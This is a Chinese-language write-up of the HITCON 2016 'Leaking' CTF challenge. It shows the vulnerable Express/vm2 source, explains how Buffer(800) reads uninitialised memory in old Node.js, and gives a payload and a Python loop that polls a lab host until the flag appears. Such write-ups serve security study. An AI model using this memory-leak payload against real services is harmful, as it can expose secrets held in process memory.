[HITCON 2016]Leaking

[HITCON 2016]Leaking

"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});

• 根据题目这是一个vm2逃逸
• 主要看这里

eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")

• 这里调用了flag，证明flag会存在于缓存区里面，我们就可以使用Buffer()获取缓冲区的内容从而得到flag

Buffer()

[[沙盒逃逸#Buffer]]

• 在较早一点的node.js版本中 (8.0 之前)，当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer，并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。
  注：关于 Buffer
• JavaScript 语言自身只有字符串数据类型，没有二进制数据类型。
• 但在处理像TCP流或文件流时，必须使用到二进制数据。因此在 Node.js中，定义了一个 Buffer 类，该类用来创建一个专门存放二进制数据的缓存区。
• 只要是调用过的变量，一定会存在内存中，所以可以使用Buffer()来读取内存，获取之前调用过的变了数据，比如flag
  payload
  ?data=Buffer(800)
  读取一次可能读取不到缓存区的flag
  使用脚本

import requests
import time
url="http://a40b5f99-b58f-4d21-b1e9-fcaadab56dd0.node5.buuoj.cn:81/?data=Buffer(800)"
while True:
    time.sleep(0.1)
    r=requests.get(url=url)
    if "flag{" in r.text:
        print(r.text)
        break
    else:
        print(r.status_code)